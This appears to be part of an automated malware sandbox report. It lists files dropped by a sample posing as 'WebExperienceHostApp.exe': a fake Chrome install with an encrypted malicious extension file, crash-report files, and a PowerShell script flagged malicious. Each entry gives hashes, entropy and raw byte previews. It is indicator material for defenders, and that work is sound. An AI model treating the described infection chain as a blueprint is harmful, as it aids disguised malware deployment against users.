Preview:	.8K..^...D).cN.P....k..T@..m..Y.@.@[.....n..J...o...x...39.LZ.R]N..$..s..........A.Rt..Qd..b.W..l>..<f.E.6.!2#.p.S.(b.B.s......B.SE...M...7.w.........{N.....L!...].sV/...-8.....Q.:d).u.....A.4...F'E.B../.}.&.i....".....i.q...D.<.....3#...2.><{{..{..n.a......xrq-.......#.......U.R..U ...........S?&.H...s....v.....np.~J6....W-..Sj....T$~..Q.`?5\|N.5.2.?.....BU..@ub.......:.CZ.j...]..jH.....3..U...1&.s9.......s_.d.c.4.X..3......Qk..SC.U...&.9F.t...h.9P......5..^.X.\....<...n....h4.....'./....1M..."?..(...C_..c....wGu.......`l.zd..FA...s.X......d{.\|.1..M6.....[.X%....v..f...o.......L......\|.....M...O.4^{R.{..!y. r7.._@.3.. m.*..].o.....Q....z.Q."(.<e..RyG.l.u.7.:.%Nz....2..`q............T..p....I@.D&.1=niUdal.Zq.....p4.`.Gi.D^a4.....H+!..X!.m.'....`.......I...~.:Y...f].0.y...s.r...G.......IOh...u.D.D6R..9.Sq.R.t7.....p..+.'..q.X....hn.D.Xb/.'..c.e.+..$.)=...V.RvK.t.Q/QM.pE.-..]..\p5.....UL\..a.5...s8R....+..8N..oYRO.A..f.r..TY..d..<.b,......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.99

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37116
Entropy (8bit):	7.994747677689325
Encrypted:	true
SSDEEP:	768:6yYUIATW3mYRfDNRFxvBqmTu9oUADyPH612ojJx2z94XSJj4:ZMvRPBqmqdlovb44XSJ4
MD5:	541703A97409F03643B2F8AE7A534509
SHA1:	BF5A64870DC5C3DFDC2209321BC1E5C62C21FFA8
SHA-256:	0F18A5ADD9085FDBF60909A8CCA9DBE79F143AF2551926D7492192A7501B40DB
SHA-512:	600BD2FEC8FA91CD5D86B1E51A7267D72EDD4DA8A2A2EF32E867319FAF45E3F479A2EBB4D5908DB59901877227EBCA5EDF7F60536966D0989F971898A2F7AF2C
Malicious:	true
Preview:	)3.~{..J.F..P............O...A1X^.{!l..-]C.@..n.g5\.....?...&.J..M.".i..#...Ec..Pl..p.C....'.o ....3-....lo...<M.m....i....~..yF...E....-...~.n.p.B...P..r.&......k..y\|......{..C...\...k..~..~.7...2.X.,.].....D...KR._<8..XD;.........=.L....8rw.7.A.K...R.......^<.B.Yd.z........+7s....j.......MP"..=.}ro.x..-O....7a!.....^Ir.\|.E..=.1....H.....17./.C...$(.....&r]^.G...5"H.,D~..X.K.....%....",..c#.....,N....%.........f.g@.'V.5......a.{.mi;.;..P9...[l.G.W...0.E\|....7.R#.M.+6.Y.Y.0e(..q...oy.....!..1.S..!...p...J..@.....n.]....R..n..EO......#..Pb........ejN....$2EUF....m...2..z.#t..t..)..r.M.7.a.rV....2.o..O`M.U..6...4-...Q.....P.c.N.?....U...o..CW..z..b...c.EM.o..Z&........%..;.i$V....rx.:.......o.:.:.?/)..B..yy5..N)..f..T...,...7.$D....E..Bf...P....&.+.<.....l.....J.>.4..s....b@6Cs\|.W..A.D\..:..]..gSk"3..\.pRrP. ..t...a...e$......T.lB+..b..."e...R.w~...]?j.).35.Wf[.I.V..%.M...0A.A>...n.f....._..._...Z.u.. .W..n..N..A%w.......h....m.!..S/.. ..,MOx

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2790176
Entropy (8bit):	6.548375158128382
Encrypted:	false
SSDEEP:	49152:g5dX0416Gg57xADFc+lhFn/su9wBAxwJfYwzkOkGtI4lecPk:yH6G/DFc+XFEtAxwn0E0
MD5:	1913EFB2223B24D2A47FAD0A1AAD8F19
SHA1:	783D8CD6E58AAB813BE44933F04828152DAD65EA
SHA-256:	796284E881E951ACA4B0ECC4C0ED5587BB3F1FD8B156E88AC9C147BFD49F9BE9
SHA-512:	7A28B582F2FD87FB3A35BA04D3C219C9089DC7AE19C6A9E9B1CBA3325CEA22874EE67A4872E10AD0598028C5BFA94403A2A76FFDFF47A8F7F211D7A9B443027D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...h.0f.........."............................@..............................+.....=4+...`..........................................C".....\|D".d.....&..C....$......j. )...`+.."....".8.....................".(...p...@...........PL".p....5"......................text............................... ..`.rdata..............................@..@.data...p.....#.......".............@....pdata........$.......#.............@..@.gxfg.........%..0....$.............@..@.retplne......%.......$..................tls....1.....%.......$.............@...CPADinfo8.....%.......$.............@..._RDATA........%.......$.............@..@malloc_h......&.......$............. ..`.rsrc....C....&..D....%.............@..@.reloc..."...`+..$...F.............@..B........................................................................................................................................

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_100_percent.pak

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	734375
Entropy (8bit):	7.96368320948898
Encrypted:	false
SSDEEP:	12288:8I3H1fJod/zgsz5B0GDJQrnKs8SNP+QSsSilxNwt0D+cImfd8xEqoO0TehEr2:b3VB4zEEmPLSUNwt0KcV6xEqoO0TO5
MD5:	D7E5189AFFC7F032A6A2D5E4213395C8
SHA1:	DD9A1D0DAD42162953E30D6351A427D6D8665918
SHA-256:	652A51FF9C655862A5C5A876BE3252757D12543ADCE27EAF76C0287C976D2B30
SHA-512:	7EB21092941DBA3CCD1AF9B8B9D884943FDA9DB253FC537A03E297C39E1FE7F98459A0CFCBB25D9C5B7873D2FC42221D038AB2ADA5D687690552A13686024D09
Malicious:	false
Preview:	..........H..."...........^...........~.........p?9...q?....r?....s?z...t?...u?N...v?....w?....x?d...y?...z?!...{?w...\|?...}?,...~?.....?....?8....?.....?....?.....?.....?)....?o....?.....?Q....?.....?.....?.....?c....?.....?.....?Y....?T....?#....?.....?s....?.....?.....?3....?n....?S....?.....?.....?#....?.....?.&...?\|'...?.'...?.@...?.B...?kB...?.B...?.K...?.U...?+i...?.}...?.~...?#....?~....?/....?E....?w....?.....?.....?F....?.....?`....?.....?.....?.....?5....?.....?.....?.....?#....?.....?.....?N....?=....?c....?.....?.!...?.)...?l2...?r;...?.D...?.N...?CW...?'`...?.j...?.s...?:{...?....?3....?x....?`....?.....?H....?.....?.....?.)...?.>...?5Q...?@m...?.....?....?Y....?.....?.....?.....?.....?d....?=(...?.;...?.I...?R_...?vj...?kt...?.{...?.....?D....?.....?.....?T....?Q....?.....?.....?}....?.....?Z....?.....?.....@. ...@J2...@MD...@.P...@.]...@.n...@b....@'....@.....@.....@.....@.....@.....@&....@.....@.....@.....@....%@#...&@....'@....(@....)@....*@....+@....,@. ..-@.&

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37129216
Entropy (8bit):	7.208637030661208
Encrypted:	false
SSDEEP:	393216:zeeVO8fy1Z15pUsl32wRe3iI//hDxYnAi1o+Vuhl8eEMYmD:zny1ZNtp2wU3iSNZi56ipMdD
MD5:	5C7A022BB452743656997C18E194F7E7
SHA1:	87C7042D0512D8932AF6668AD069A67E21953961
SHA-256:	7725ECC8B2249CE9593FF739FD848D04F64745B5AB4FE8371840AD22181F2AF4
SHA-512:	19524E72B33469FAA3A7D0977C1051FAC4843AAB83ADCBAF895F7160CABAB61D7DC4804399C4212FE2EDFFB71FC52AE6052A83CDE3B613CDE9361A413273859B
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........PE..d...N\|Pf.........." .........<R.....\.........@...............................?...........`.......................... ...............................05.d.....*..............@5.4J...................................................0..H.......`....................text...8........................... ..`.data...h...........................@....bss....p....@...........................idata..&\.......^...&..............@....didata......0......................@....edata..............................@..@.rdata..E...........................@..@.dim....LF.......H... ..............@..@.pdata..(....@.......h..............@..@..yy.........0.......N.............. ..`.g1t....x....0.......J..............@....nFA......g..@....g..L..............`..h.rsrc...d....05......<,.............@..@.reloc..4J...@5..L...@,.............@..B....@..@........................................

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1526048
Entropy (8bit):	6.312728707391181
Encrypted:	false
SSDEEP:	12288:BSPqsQ+j9IS5/7PsMaaCi0aaGzHl1IbgTU2fYKsy4meOFeeo7xh0Qzo8sM0+nk8J:RsQ83Tka6ozFibgI2QKuveo7Lzn
MD5:	FF7F8FE57822B5CB61F519A0298428DE
SHA1:	030B124A5F3BBE550F84F4BACAB03D1F1CAEE516
SHA-256:	5BC0B57B68E514F393946C8A3C775B920C8552887479B3F68251804E0217E0C0
SHA-512:	7D504F7CEFB64DAC9090EF960211AA1D80EC6542B0016682AEEFF33A125D611867342B8A010FD63553F281C10CC3E9B3D6A339F6A0C054E5E272C997406671D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....6e.........."......`.....................@..........................................`.........................................pe..\....e.......0...&........... .. )...`.......Z.......................X..(...p...@...........pl...............................text...f^.......`.................. ..`.rdata..L....p.......d..............@..@.data...@....0......................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h..... ...................... ..`.rsrc....&...0...(..................@..@.reloc.......`......................@..B................................................................................................

C:\ProgramData\Chrome\Application\118.0.5993.120\file.cur

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	MS Windows cursor resource - 1 icon, 32x32, hotspot @0x0
Category:	dropped
Size (bytes):	326
Entropy (8bit):	1.2807478913655284
Encrypted:	false
SSDEEP:	3:GlFFXlGFllfl/t+lklel/e/hRD:Gl/Nls62bD
MD5:	DBD44C4AC444D2E0448EC0AD24EC0698
SHA1:	371D786818F0A4242D2FCED0C83412CAA6C17A28
SHA-256:	BF79BFFDBA70F456CB406FD1ECE8652750363B94188510B5D73F36C8EA6E7AE9
SHA-512:	E8025CEB6ECB76B480F279D7E42DEEC8B96C0C1D64CFA3B7AF1E68320281F0F2A9B886AFC16AADE4E2178878970C4909FD650C1DC3C37594D040141ED0AB113F
Malicious:	false
Preview:	...... ......0.......(... ...@.......................................................................................................................................................................................................................................................................................................

C:\ProgramData\Chrome\Application\118.0.5993.120\vk_swiftshader_icd.json

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	5.5070342061402435
Encrypted:	false
SSDEEP:	3:ycsU9OPienFYyLmsgq8TUWSnrdSHn:yDZdLmTTUhKn
MD5:	FA1D7C665B045EFD9AF9E0214554B2AF
SHA1:	8AB950E1363216DB0DC689B64129F29D0CB5903A
SHA-256:	5977B785E0E74DE897AFDCB0F5910503FE4DA3913EDC02289041AC15226C5BA3
SHA-512:	CF458BEBB6C36F2C84E5C082C899BA31246AF4B36837DB896810AF0D37E3E6360AF120CE7EAE83A74BEE15D3A84CEFA05541FDA55EFFAEDD08F3F37143186863
Malicious:	false
Preview:	Zti9Iqt3GC1RuMyRbVl4aLbXJ+Y7LjzAFydrKiLlc7shAkRWZB+FmooUwqZbM5nWzmWYW0q/nol5v7pqxAq3finMGctQXtvBWJiuhZyQFpo=

C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	957728
Entropy (8bit):	6.61749314970573
Encrypted:	false
SSDEEP:	24576:Chn0GjuAhKHBEwjUrHyu6Z5W1DYsHq6g3P0zAk74fJQf:ChdMHBEqkHj6Z5W1DYsHq6g3P0zAk7I
MD5:	CFA38CC9320331B3D7A52A58A6AE4577
SHA1:	9BAEDFB077FA677ACE979B46F597DAB16038D684
SHA-256:	F3FA8B4F48697F87D34E8CA0262977FE0A8AE3EB04242E9143B3886E754918A0
SHA-512:	BA2D9AA803C039F323868CDCEC9B532BBC67A7DD87D4156CF732A5CEAEEC3F804B390B1A03362A314147D7BC339D3B4D50C89673288855CAECD6CF78C13C1513
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...h.0f.........." ................................................................;.....`A............................................<!...&..P................q...t.. )......(.......8.......................(.......@............+...............................text...[........................... ..`.rdata..............................@..@.data....L......."..................@....pdata...q.......r..................@..@.gxfg...P).......*...2..............@..@.retplne.............\...................tls.................^..............@..._RDATA...............`..............@..@.rsrc................b..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_c93e2ab35bf4e24e0cdcd22579377d3186fb6_5aba68d6_97dfc3d3-9e4c-4157-8c91-42bd7040bc82\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9265152879834504
Encrypted:	false
SSDEEP:	192:Y5FkEs/gGW0T37y6j5BZFtfqzuiFxZ24lO8q:03s/gsT37y6jszuiFxY4lO8q
MD5:	C37554FBE37AAFD0D6DD9B41D994709E
SHA1:	57D26F4C02630300AC4F31918FAFF0FBE98D10D3
SHA-256:	A3C57FE7238C1FC429FE120FC35F6D80CB8CE05D34752295D237174002752F7F
SHA-512:	46B948B0BD142968A19887FB77B50F12203C4D4D0CE05B81A31F5EE8ECEA7A62FB3788F0F9A5949964C009007AEDA36001E767ABA37C556D544DB7AFCEA33E1A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.0.5.0.8.1.7.7.6.2.1.5.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.0.5.0.8.1.8.1.6.8.4.0.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.d.f.c.3.d.3.-.9.e.4.c.-.4.1.5.7.-.8.c.9.1.-.4.2.b.d.7.0.4.0.b.c.8.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.9.e.b.4.1.e.-.a.b.5.d.-.4.b.8.4.-.a.e.c.d.-.9.3.3.b.c.3.3.3.f.2.2.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.4.-.0.0.0.1.-.0.0.1.4.-.d.2.5.0.-.c.6.9.1.0.c.a.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.5.2.e.9.b.5.1.a.b.b.4.1.1.1.5.f.0.d.6.c.c.9.f.b.9.5.7.c.f.b.3.0.0.0.0.0.9.0.4.!.0.0.0.0.7.8.3.d.8.c.d.6.e.5.8.a.a.b.8.1.3.b.e.4.4.9.3.3.f.0.4.8.2.8.1.5.2.d.a.d.6.5.e.a.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER25E5.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri May 24 19:00:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	80178
Entropy (8bit):	1.6712931703662939
Encrypted:	false
SSDEEP:	192:w67bqw6IQO8sjWK0CNU8U3mlGZnNSlQn/QMQl/gf4q6xA9wbq:Fbv6KHqKbLimlGvSlW864Rxnbq
MD5:	3A4FDA0C539C6D5B0329B2284C820295
SHA1:	47E5D079A322F280551AE244AE40DD7FD64578C7
SHA-256:	B955FA24E11CD751EF8549CE3975FEA950ADC21832312BF3784F92F3497C4885
SHA-512:	FCA1BDED9496334585C1AFDA220F0F91B5CE290D22D9E74752B767895EE79F6F1AAEA3059C8703CCC5BE6EECABDD57DFC210F3A894034D1648FD90289F9F1AEE
Malicious:	false
Preview:	MDMP..a..... .........Pf........................P...........T...<8..........T.......8...........T...............*"......................................................................................................eJ..............Lw......................T.............Pf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER26F0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6536
Entropy (8bit):	3.7209053937342227
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetboKo+3OeYBEuIEST5aMQUTk89bEpDdfWSjsm:R6l7wVeJoKo+XYBE/XpDg89bEpBfWGsm
MD5:	4A0348C8EEAC0ADE2F20EE84A2B784AD
SHA1:	E730DE1C21DF66E2B7F639E338B2925618D8C7D5
SHA-256:	0C2C7FA7B5988979DCE4845F49548955DDD103E8DD47D0F89673B805470509BC
SHA-512:	E450CEF59B06F1D5BBAFEC74EE99BB8B47FC40BBD2B0E06AAE9841C8EF0CFA6E52A65D5591B8A50E5F423563CADB72F37EAF58A3E7EB752C595BF328D0AF17E1
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2720.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4697
Entropy (8bit):	4.444621187650748
Encrypted:	false
SSDEEP:	48:cvIwWl8zskJg771I9GhWpW8VYz10Ym8M4JGBDQmGsFRPyq85KhQ1xn+UggUKUpdd:uIjfiI7xw7VWJGBDAAXhsxZggUKUpdd
MD5:	0BCAF6924061586A554B86C654D56A5B
SHA1:	342F25058E22D19C40992A04E3CCA91C779E4442
SHA-256:	9839B75ADE04D7AF883A10AE750C96CAD2217B2D3BD7BD5FD099C1DF771C2F24
SHA-512:	58BEBE1C4420CC15464A63A0F1E8115471D0B539C054F0EEDAE37E28A0A276868E682DBEF838D5D40158BCC5E1F305E5CBF94A5F4F6DA166C818798C397820F6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="337562" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1388
Entropy (8bit):	5.429206451836514
Encrypted:	false
SSDEEP:	24:3DytPWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9t7J0gt/NK3R8qr6SVbl:Ty1WSU4y4RQmFoUeUmfmZ9tK8NWR8q33
MD5:	15B95BE0C78BA2A26D348242F7450F9F
SHA1:	A4E2B91AFB95B85378E3154BD8535368458BF39A
SHA-256:	868F5A8CEBE0751CA3B1F0D9ADCB19CABD40528B06D40725A642BA8F13F8BA9B
SHA-512:	40773F24B9D311DA998153C7CD1C39337B1B7AC39CCD4128C4C2F93ABA1EB699510D7AC8AA99266BD4B252070EA09256D69A5BD0476DCF51020194866A1B59EC
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Pro43F6.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.173033892020167
Encrypted:	false
SSDEEP:	3:eJMl7zWv:eJ47zo
MD5:	8D0C91BC45A53C53A595F929977B8B5A
SHA1:	9AB24B23F38E83C1F51DC3B827BDFA447A422656
SHA-256:	BD0392B6AC996038AAC5E6656FB72B863F76261F8FDB5E17281C1B8DB80C2FD6
SHA-512:	E3E3F394838223C2EF5C143D7077752F3C43B2FDC67AA3E2BE1846D21876F54EB0D2B5A07124CD079BAB5BDB048641BE8534345B28FB3908F4B1F61F31F7C52A
Malicious:	false
Preview:	Arquivo ZIP baixado com sucesso!.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l0adzgv.f10.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqfxtzvr.pkr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\pss43F5.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6668
Entropy (8bit):	3.5127462716425657
Encrypted:	false
SSDEEP:	96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
MD5:	30C30EF2CB47E35101D13402B5661179
SHA1:	25696B2AAB86A9233F19017539E2DD83B2F75D4E
SHA-256:	53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
SHA-512:	882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
Malicious:	true
